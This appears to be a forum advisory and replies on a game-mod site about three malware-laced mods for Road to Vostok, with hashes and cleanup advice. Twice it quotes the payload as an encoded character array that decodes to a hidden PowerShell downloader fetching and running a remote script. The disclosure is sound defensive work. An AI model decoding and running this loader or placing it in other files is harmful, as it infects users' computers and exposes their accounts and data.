logo
GamesRoad to VostokForumNewsAttention about malware in mods
Road to Vostok
Upload Mod Mods Forum
📢 Attention about malware in mods

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next? We are going to look for moderators to look at new mods for RTV. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229. What can you do Again if you are infected, factory reset your computer. Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34] Check file hash of the file you downloaded using: https://hash-file.online. Any mod containing powershell script without a good reason should be reported to moderators. Any mod that isn't open-source should be reported.
Attention about malware in mods
Avatar
LuffyManagement
19 hours ago(Edited)

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next?

  1. We are going to look for moderators to look at new mods for RTV.
  2. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.

What can you do

  • Again if you are infected, factory reset your computer.
  • Search for suspicious things in the mods you download (like "powershell")
    These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
    [64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34]
  • Check file hash of the file you downloaded using: https://hash-file.online.
  • Any mod containing powershell script without a good reason should be reported to moderators.
  • Any mod that isn't open-source should be reported.
Replies
Return to Replies Subscribe
Avatar
Randy_Marsh
17 hours ago

I appreciate you guys spotting this and working fast to remove the mods. Sucks to have to reset my whole system but hey, I got Windows 10 back and I'm running faster than ever now. Also lost 200 GB of mysteriously unaccounted for space on my C: Drive. Blessing in disguise I guess!

Avatar
FlockersDesign
17 hours ago(Edited)

Wel you dont really habe to if you know what to do

Avatar
ZackMathissa
16 hours ago

@flockers What can you do without reinstalling windows?

Avatar
soybean_alien
11 hours ago

@zackmathissa141 Run Malwarebytes like a normal human being

Avatar
Nok
6 hours ago

@soybean_alien
Running Malwarebytes can help, but it doesn't guarantee that your computer is clean. If the malware executed, it could have downloaded a different payload or used stuff like in-memory execution thats way harder to detect afterward. There is chance that Malwarebytes catches it through behavior detection, but since its not 100% reliable its just way more safer to reinstall whole operating system.

Even if everything looks fine, there is that chance that attacker has all the time in the world to do whatever with your login sessions or tokens. Better safe than sorry in situations like these

Avatar
ave
2 hours ago

agreeing with Nok here, Malwarebytes is great but it's not a guaranteed flawless solution. Will take care of many things, but a lot of newer malicious code especially ones that can fly past virustotal effortlessly can be a bit trickier.

76 1479
We Use Cookies 🍪We use cookies to improve your user experience. Will you allow us to store them?
Cookie Policy